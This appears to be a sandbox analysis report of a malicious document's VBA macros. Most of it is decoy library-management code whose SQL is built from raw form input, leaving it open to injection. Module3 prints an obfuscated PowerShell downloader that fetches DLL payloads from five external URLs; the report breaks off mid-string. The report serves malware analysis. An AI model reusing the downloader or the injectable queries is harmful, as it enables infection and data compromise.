                                                                                              txtRemarks

                                                                                              134

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Execute

                                                                                              txtID

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              palen

                                                                                              StringsDecrypted Strings
                                                                                              "insert into dbo.Tbl_TRANSACTION values(""'"
                                                                                              LineInstructionMeta Information
                                                                                              98

                                                                                              Public Sub OkBorrowed()

                                                                                              99

                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" & "'" & frmTrans1.txtID.Text & "'," & "'" & frmTrans1.txtCall_no.Text & "'," & "'" & frmTrans1.txtTitle.Text & "'," & "'" & frmTrans1.txtAuthor.Text & "'," & "'" & frmTrans1.txtACC.Text & "'," & "'" & frmTrans1.txtBorrow.Text & "'," & "'" & frmTrans1.txtDue.Text & "'," & "'" & frmTrans1.txtReturned.Text & "'," & "'" & frmTrans1.txtRemarks.Text & "')"

                                                                                              Execute

                                                                                              txtID

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              109

                                                                                              frmTrans1.palen.Caption = 1

                                                                                              palen

                                                                                              110

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              StringsDecrypted Strings
                                                                                              "update dbo.Tbl_TRANSACTION set ""Call_no = '"
                                                                                              LineInstructionMeta Information
                                                                                              136

                                                                                              Public Sub Returned1()

                                                                                              137

                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " & "Call_no = '" & frmTrans1.txtCall_no.Text & "', " & "Title = '" & frmTrans1.txtTitle.Text & "', " & "Author='" & frmTrans1.txtAuthor.Text & "', " & "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " & "Date_Due='" & frmTrans1.txtDue.Text & "', " & "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " & "Status = '" & frmTrans1.txtRemarks.Text & "'" & "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              147

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= ""'"
                                                                                              LineInstructionMeta Information
                                                                                              19

                                                                                              Public Sub Edit_Book_Tran()

                                                                                              20

                                                                                              Set rs = New ADODB.Recordset

                                                                                              21

                                                                                              rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              23

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              24

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              25

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              26

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              27

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtID

                                                                                              lblname

                                                                                              lblmi

                                                                                              lbllast

                                                                                              StringsDecrypted Strings
                                                                                              "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= ""'"
                                                                                              LineInstructionMeta Information
                                                                                              68

                                                                                              Public Sub Datagrid_Trans1()

                                                                                              69

                                                                                              Set rs = New ADODB.Recordset

                                                                                              70

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              72

                                                                                              frmTrans1.txtID.Text = rs!ID

                                                                                              txtID

                                                                                              73

                                                                                              frmTrans1.lblname.Caption = rs!Firstname

                                                                                              lblname

                                                                                              74

                                                                                              frmTrans1.lblmi.Caption = rs!MI

                                                                                              lblmi

                                                                                              75

                                                                                              frmTrans1.lbllast.Caption = rs!Lastname

                                                                                              lbllast

                                                                                              76

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              StringsDecrypted Strings
                                                                                              "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= ""'"
                                                                                              LineInstructionMeta Information
                                                                                              113

                                                                                              Public Sub Display_list()

                                                                                              114

                                                                                              Set rs = New ADODB.Recordset

                                                                                              115

                                                                                              rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              117

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              118

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              119

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              120

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              121

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              Datagrid3

                                                                                              StringsDecrypted Strings
                                                                                              "select *from Tbl_Transaction where ID ='"
                                                                                              LineInstructionMeta Information
                                                                                              78

                                                                                              Public Sub Display_borrower()

                                                                                              79

                                                                                              Set rs = New ADODB.Recordset

                                                                                              80

                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              81

                                                                                              Set frmTrans1.Datagrid3.DataSource = rs

                                                                                              Datagrid3

                                                                                              83

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid1

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_STUDENTS"
                                                                                              LineInstructionMeta Information
                                                                                              29

                                                                                              Public Sub View_StudentS_Trans1()

                                                                                              30

                                                                                              Set rs = New ADODB.Recordset

                                                                                              31

                                                                                              rs.Open "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              32

                                                                                              Set frmTrans1.DataGrid1.DataSource = rs

                                                                                              DataGrid1

                                                                                              33

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid4

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK"
                                                                                              LineInstructionMeta Information
                                                                                              91

                                                                                              Public Sub View_Trans3result()

                                                                                              92

                                                                                              Set rs = New ADODB.Recordset

                                                                                              93

                                                                                              rs.Open "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              94

                                                                                              Set frmTrans1.DataGrid4.DataSource = rs

                                                                                              DataGrid4

                                                                                              95

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Execute

                                                                                              Item

                                                                                              StringsDecrypted Strings
                                                                                              "Delete from dbo.Tbl_TRANSACTION"" where ID = '"
                                                                                              LineInstructionMeta Information
                                                                                              149

                                                                                              Public Sub Delete()

                                                                                              150

                                                                                              con.Execute "Delete from dbo.Tbl_TRANSACTION" & " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"

                                                                                              Execute

                                                                                              Item

                                                                                              152

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              StringsDecrypted Strings
                                                                                              "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                              LineInstructionMeta Information
                                                                                              6

                                                                                              Public Sub Connect_Student_Trans1()

                                                                                              7

                                                                                              On Error Resume Next

                                                                                              8

                                                                                              Set con = New ADODB.Connection

                                                                                              9

                                                                                              con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"

                                                                                              Open

                                                                                              11

                                                                                              End Sub

                                                                                              Module: Module2

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Module2"

                                                                                              2

                                                                                              Option Explicit

                                                                                              3

                                                                                              Global con as ADODB.Connection

                                                                                              4

                                                                                              Global rs as ADODB.Recordset

                                                                                              Non-Executed Functions
                                                                                              APIsMeta Information

                                                                                              cboSea

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              cboSea

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              cboSea

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid1

                                                                                              StringsDecrypted Strings
                                                                                              "ID"
                                                                                              "Select * from Tbl_STUDENTS ""where ID = '"
                                                                                              "Select * from Tbl_STUDENTS ""where ID = '"
                                                                                              "Lastname"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
                                                                                              "Course"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Course = '"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Course = '"
                                                                                              LineInstructionMeta Information
                                                                                              35

                                                                                              Public Sub Search_Trans1()

                                                                                              36

                                                                                              Set rs = New ADODB.Recordset

                                                                                              37

                                                                                              If frmTrans1.cboSea.Text = "ID" Then

                                                                                              cboSea

                                                                                              38

                                                                                              rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              41

                                                                                              Elseif frmTrans1.cboSea.Text = "Lastname" Then

                                                                                              cboSea

                                                                                              42

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              45

                                                                                              Elseif frmTrans1.cboSea.Text = "Course" Then

                                                                                              cboSea

                                                                                              46

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              49

                                                                                              Endif

                                                                                              50

                                                                                              Set frmTrans1.DataGrid1.DataSource = rs

                                                                                              DataGrid1

                                                                                              51

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              cboSBook

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              cboSBook

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid4

                                                                                              StringsDecrypted Strings
                                                                                              "Call no"
                                                                                              "Select * from Tbl_BOOK ""where Call_no = '"
                                                                                              "Select * from Tbl_BOOK ""where Call_no = '"
                                                                                              "Book Name"
                                                                                              "Select * from dbo.Tbl_BOOK ""where Title = '"
                                                                                              "Select * from dbo.Tbl_BOOK ""where Title = '"
                                                                                              LineInstructionMeta Information
                                                                                              53

                                                                                              Public Sub Search_Book1()

                                                                                              54

                                                                                              Set rs = New ADODB.Recordset

                                                                                              55

                                                                                              If frmTrans1.cboSBook.Text = "Call no" Then

                                                                                              cboSBook

                                                                                              56

                                                                                              rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              59

                                                                                              Elseif frmTrans1.cboSBook.Text = "Book Name" Then

                                                                                              cboSBook

                                                                                              60

                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              63

                                                                                              Endif

                                                                                              64

                                                                                              Set frmTrans1.DataGrid4.DataSource = rs

                                                                                              DataGrid4

                                                                                              65

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='"
                                                                                              "Returned"
                                                                                              LineInstructionMeta Information
                                                                                              123

                                                                                              Public Sub Returned()

                                                                                              124

                                                                                              Set rs = New ADODB.Recordset

                                                                                              125

                                                                                              rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              126

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              127

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              128

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              129

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              130

                                                                                              frmTrans1.txtBorrow.Text = rs!Date_Borrowed

                                                                                              txtBorrow

                                                                                              131

                                                                                              frmTrans1.txtDue.Text = rs!Date_Due

                                                                                              txtDue

                                                                                              132

                                                                                              frmTrans1.txtReturned.Text = rs!Date_Returned

                                                                                              txtReturned

                                                                                              133

                                                                                              frmTrans1.txtRemarks.Text = "Returned"

                                                                                              txtRemarks

                                                                                              134

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Execute

                                                                                              txtID

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              palen

                                                                                              StringsDecrypted Strings
                                                                                              "insert into dbo.Tbl_TRANSACTION values(""'"
                                                                                              LineInstructionMeta Information
                                                                                              98

                                                                                              Public Sub OkBorrowed()

                                                                                              99

                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" & "'" & frmTrans1.txtID.Text & "'," & "'" & frmTrans1.txtCall_no.Text & "'," & "'" & frmTrans1.txtTitle.Text & "'," & "'" & frmTrans1.txtAuthor.Text & "'," & "'" & frmTrans1.txtACC.Text & "'," & "'" & frmTrans1.txtBorrow.Text & "'," & "'" & frmTrans1.txtDue.Text & "'," & "'" & frmTrans1.txtReturned.Text & "'," & "'" & frmTrans1.txtRemarks.Text & "')"

                                                                                              Execute

                                                                                              txtID

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              109

                                                                                              frmTrans1.palen.Caption = 1

                                                                                              palen

                                                                                              110

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              StringsDecrypted Strings
                                                                                              "update dbo.Tbl_TRANSACTION set ""Call_no = '"
                                                                                              LineInstructionMeta Information
                                                                                              136

                                                                                              Public Sub Returned1()

                                                                                              137

                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " & "Call_no = '" & frmTrans1.txtCall_no.Text & "', " & "Title = '" & frmTrans1.txtTitle.Text & "', " & "Author='" & frmTrans1.txtAuthor.Text & "', " & "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " & "Date_Due='" & frmTrans1.txtDue.Text & "', " & "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " & "Status = '" & frmTrans1.txtRemarks.Text & "'" & "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              147

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= ""'"
                                                                                              LineInstructionMeta Information
                                                                                              19

                                                                                              Public Sub Edit_Book_Tran()

                                                                                              20

                                                                                              Set rs = New ADODB.Recordset

                                                                                              21

                                                                                              rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              23

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              24

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              25

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              26

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              27

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtID

                                                                                              lblname

                                                                                              lblmi

                                                                                              lbllast

                                                                                              StringsDecrypted Strings
                                                                                              "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= ""'"
                                                                                              LineInstructionMeta Information
                                                                                              68

                                                                                              Public Sub Datagrid_Trans1()

                                                                                              69

                                                                                              Set rs = New ADODB.Recordset

                                                                                              70

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              72

                                                                                              frmTrans1.txtID.Text = rs!ID

                                                                                              txtID

                                                                                              73

                                                                                              frmTrans1.lblname.Caption = rs!Firstname

                                                                                              lblname

                                                                                              74

                                                                                              frmTrans1.lblmi.Caption = rs!MI

                                                                                              lblmi

                                                                                              75

                                                                                              frmTrans1.lbllast.Caption = rs!Lastname

                                                                                              lbllast

                                                                                              76

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              StringsDecrypted Strings
                                                                                              "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= ""'"
                                                                                              LineInstructionMeta Information
                                                                                              113

                                                                                              Public Sub Display_list()

                                                                                              114

                                                                                              Set rs = New ADODB.Recordset

                                                                                              115

                                                                                              rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              117

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              118

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              119

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              120

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              121

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              Datagrid3

                                                                                              StringsDecrypted Strings
                                                                                              "select *from Tbl_Transaction where ID ='"
                                                                                              LineInstructionMeta Information
                                                                                              78

                                                                                              Public Sub Display_borrower()

                                                                                              79

                                                                                              Set rs = New ADODB.Recordset

                                                                                              80

                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              81

                                                                                              Set frmTrans1.Datagrid3.DataSource = rs

                                                                                              Datagrid3

                                                                                              83

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid1

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_STUDENTS"
                                                                                              LineInstructionMeta Information
                                                                                              29

                                                                                              Public Sub View_StudentS_Trans1()

                                                                                              30

                                                                                              Set rs = New ADODB.Recordset

                                                                                              31

                                                                                              rs.Open "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              32

                                                                                              Set frmTrans1.DataGrid1.DataSource = rs

                                                                                              DataGrid1

                                                                                              33

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid4

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK"
                                                                                              LineInstructionMeta Information
                                                                                              91

                                                                                              Public Sub View_Trans3result()

                                                                                              92

                                                                                              Set rs = New ADODB.Recordset

                                                                                              93

                                                                                              rs.Open "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              94

                                                                                              Set frmTrans1.DataGrid4.DataSource = rs

                                                                                              DataGrid4

                                                                                              95

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Execute

                                                                                              Item

                                                                                              StringsDecrypted Strings
                                                                                              "Delete from dbo.Tbl_TRANSACTION"" where ID = '"
                                                                                              LineInstructionMeta Information
                                                                                              149

                                                                                              Public Sub Delete()

                                                                                              150

                                                                                              con.Execute "Delete from dbo.Tbl_TRANSACTION" & " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'"

                                                                                              Execute

                                                                                              Item

                                                                                              152

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              StringsDecrypted Strings
                                                                                              "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                              LineInstructionMeta Information
                                                                                              6

                                                                                              Public Sub Connect_Student_Trans1()

                                                                                              7

                                                                                              On Error Resume Next

                                                                                              8

                                                                                              Set con = New ADODB.Connection

                                                                                              9

                                                                                              con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"

                                                                                              Open

                                                                                              11

                                                                                              End Sub

                                                                                              Module: Module3

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Module3"

                                                                                              Executed Functions
                                                                                              APIsMeta Information

                                                                                              Environ

                                                                                              Environ("USERPROFILE") -> C:\Users\Albus

                                                                                              ttt1

                                                                                              Replace

                                                                                              Replace("start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://lotolands.com/JtaTAt4Ej/130921.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; ","ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ","") -> start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://chaturanga.groopy.com/7SEZBnhMLW/130921.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; start-sleep -s 1 $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; 